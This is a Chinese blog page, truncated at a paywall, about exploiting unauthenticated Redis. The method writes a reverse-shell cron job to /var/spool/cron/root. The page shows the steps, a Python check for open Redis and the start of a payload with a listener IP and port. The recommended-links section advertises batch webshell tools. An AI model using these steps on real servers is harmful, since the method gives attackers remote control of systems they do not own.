Redis Getshell自动化实践之cron

最新推荐文章于 2024-06-13 15:07:08 发布
最新推荐文章于 2024-06-13 15:07:08 发布
阅读量4.2k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: redis shell 自动化 数据 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cd_xuyue/article/details/51982063

利用流程

1 通过redis未授权访问漏洞,向redis插入一条记录,内容是反弹shell的定时任务
2 通过redis数据导出功能,将含有定时任务代码的数据导出到/var/spool/cron/root
3 监听端口,获取shell

编写exp

完整代码:
https://github.com/Xyntax/POC-T/blob/master/script/redis-cron-getshell.py

和之前的ssh-key相比简单了点.

首先判断是否存在未授权访问

r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
if 'redis_version' in r.info():

构造定时任务代码

listen_ip = '115.28.1.1'
listen_port = 9999

payload = '\n\n*
最低0.47元/天 解锁文章

200万优质内容无限畅学
ssrf结合redis未授权getshell
07-07 1569
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis未授权,即可getshell
redis 在渗透中 getshell 方法总结
chenglanqi6606的博客
05-07 2721
0x00 前言 今天同学突然提到了redis,想到最近搞站确实有一段时间没有遇到redis getshell的场景了(主要是最近懒,搞得少),有些利用方式都忘的差不多,这里再对常见的redis getshell方式总结并复现一遍,避免遗忘。如果有同学恰好看到了这篇文章,并能解决自己的问题,...
redis_cron:受pg_cron启发的Cron Job Scheduler Redis模块
03-06
redis_cron redis_cronRedis一个基于cron表达式的简单作业调度程序,它在redis中作为模块运行。 它使用与常规cron相似的语法,并允许您直接在redis上调度redis命令。 这个项目的灵感来自PostgreSQL扩展 。 由于redis命令只能在redis中一次由一个线程运行,因此redis_cron在单个线程中按顺序运行计划的作业。 安装 $ cargo build $ # Mac: $ redis-server --loadmodule ./target/debug/libredis_cron.dylib $ # Linux: $ redis-server --loadmodule ./target/debug/libredis_cron.so 用法 可用命令: CRON.SCHEDULE <cron> <redis-com
Redis服务器(二)-serverCron函数
星光之子的博客
09-27 489
serverCron函数概述更新服务器时间缓存更新LRU时钟更新 服务器 每秒执行命令次数更新 服务器(的)内存峰值记录处理SIGTERM信号管理客户端资源管理数据库资源行被延迟的BGREWRITEAOF检查持久化操作的运行状态将AOF缓冲区中的内容写入AOF文件关闭异步客户端增加cronloops计数器的值 概述 Redis服务器中的serverCron函数默认每隔100毫秒执行一次 这个函数负责管理服务器的资源,并保持服务器自身的良好运转 更新服务器时间缓存 Redis服务器中 有不少功能 需要 获取系
MetInfo 5.1 自动化getshell工具
weixin_30670151的博客
12-30 284
title: MetInfo V5.1 GetShell一键化工具 date: 2016-06-08 22:40:32 categories: Hacker tags: - Hacker - Tools --- ---------- # 漏洞解析: ---------- **config/config.inc.php** ```php $langoks = ...
cron表达式
技术博客
01-11 452
一,简介        cron表达式是linux系统定时任务执行的一个标准规范。按照cron表达式语法,我们可以定制任务触发执行的时间点。 二,cron表达式语法        顺序单位:   秒     分     时     日     月     周      年(一般省略不写)        * :使用星号(*) 指示着这个单位域上包含所有合法的值。例如,在月份域上使用*意味...
discuz-getshell-auto-method2:Discuz 全自动GetShell 方法#2
05-11
Discuz 全自动 GetShell 本方法比写 config_ucenter.php 更加稳定,而且不易出错 用法 打开 dzhack.php, 找到 $webshell = '<?php phpinfo(); ?>'; list ($status, $data) = $dz->hack ( 'http://ubuntu64/dz/', 'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4', ... ); 先把第一行 $webshell 的内容改了,不需要考虑编码问题, 然后修改 hack 函数的参数,第一个为 discuz 的起始路径,第二行为你找到的 UC_KEY 然后执行 php dzhack.php, 会在 data/client.php 下面生成一个 webshell, ![Sc
redis未授权getshell整合利用
qq_40898302的博客
06-13 1781
redis未授权getshell四种方式
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2377
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
批量getshell工具全自动_绝大多数人都不知道的电商工具,不会美工不会写文案照样能做淘宝...
weixin_39598584的博客
11-04 481
做电商不会写文案 也不会美工怎么办呢? 很简单,首先进入我们的千牛然后打开千牛的卖家工作台 点击这个店铺管理然后找到里面的智能设计然后你就可以看到这个智能设计工作台,里面的设计工具会出现四个。1.顽兔抠图电商图片处理专家,可以快速进行抠图处理轻松几步就能完成图片批量处理,节约您80%的图片处理时间。 2 鹿班设计拥有三种功能:1.店铺点击优化(网页店面智能运营) 一键生成整套模板、支持全店一键装修...
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
天羽全自动getshell工具VIP版.zip
09-25
天羽全自动getshell工具VIP版,批量getshell工具,超级好用!!大家下载试试吧!!效果不错哦!!
HM收割机一建getshell
02-22
懂得人自然懂 不懂得当然不懂 纯自动化 关键词 排名 拿shel l一键getshell
批量getshell教程+工具
07-28
批量getshell教程+工具
全自动批量web拿shell工具【2023最新】
05-13 952
全自动批量web拿shell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
批量getshell工具全自动_向阳全自动糊合机型号齐全
weixin_39531183的博客
10-26 256
向阳全自动糊合机型号齐全 鄞州包装机械厂是一家专业制造纸包装机械的企业,公司聚集了众多国内纸包装机械的专业人才,拥有雄厚的技术力量,良好的工艺装备,齐全的检测手段,完善的质量管理体制。公司本着“传承,创新,超越,奉献”的企业精神,以“质量是生命,诚信是保证,服务是永恒”的经营理念们将不断加大糊盒机产品研发力量、不断创新、不断超越自己,用优质的产品与良好的服务,为印刷包装事业的发展,奉献一份力量。...
Cron 表达式详解
Be yourself.
06-13 3835
前言 本文主要包括如下几个部分: crontab in shell cron in java 常见的cron表达式 Spring中cron表达式配置 crontab in shell cron英文含义为克龙(时间单位 百万年)。在开发中cron常用于处理定时任务。shell内的cron主要实现有crontab。可以通过cat /etc/crontab进行查看,我的cron如下所示:...
批量getshell工具全自动_【技巧1001-19】- 文件管理升级-全自动更新版
weixin_39564831的博客
11-14 438
今天我们分享办公实战技巧19,关于文件管理,前面我们是有介绍了一篇,方法也是比较简单方便,是否临时的文件管理,不管没有办法实现文件新增和删除以及添加子文件更的问题,所以有了今天这篇,全自动更新升级版文件管理,值得说的是非常简单​简单好用的文件管理:【技巧1001-4】-批量提取文件名并建立超链接可以筛选的文件管理:Excel版本动态可筛选的文件管理器文件通用管理模板(VBA):分享|文件管理模板以...
Linux & Unix shell 编程指南之cron表达式
jsfzdd的专栏
11-07 2635
表达式举例说明 一个cron表达式有至少6个(也可能7个,6个比7个少元素秒)由空格分隔的时间元素。   从左往右按顺序依次为 秒(0~59)---- 分(0~59) 时(0~23) 日(0~31,但是你需要考虑你月的天数) 月(0~11) 周(0~6 0=SUN 或 SUN,MON,TUE,WED,THU,FRI,SAT) 年(1970-209
K8s终端清理redis缓存
最新发布
05-27
#### 自动化脚本清理 Redis 缓存 如果希望定期自动清理 Redis 缓存,可以在 Kubernetes Job 或 CronJob 中定义任务。例如创建一个 Shell 脚本来完成此操作并将它作为一次性作业提交给集群处理。 ```yaml apiVersion...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值